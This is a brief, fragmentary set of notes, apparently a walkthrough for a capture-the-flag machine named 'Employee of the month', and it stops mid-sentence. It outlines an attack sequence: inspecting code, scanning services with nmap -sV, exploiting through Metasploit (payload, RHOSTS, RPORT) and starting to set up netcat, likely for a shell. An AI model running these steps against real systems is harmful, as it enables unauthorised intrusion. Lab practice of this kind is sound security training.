1. Employee of the month -inspect code

  2. nmap scan to see services running nmap -sV Ip

  3. metasploit msfconsole -search for exploit set payload set RHOSTS set RPORT exploit

  4. get exploit use netcat to setup a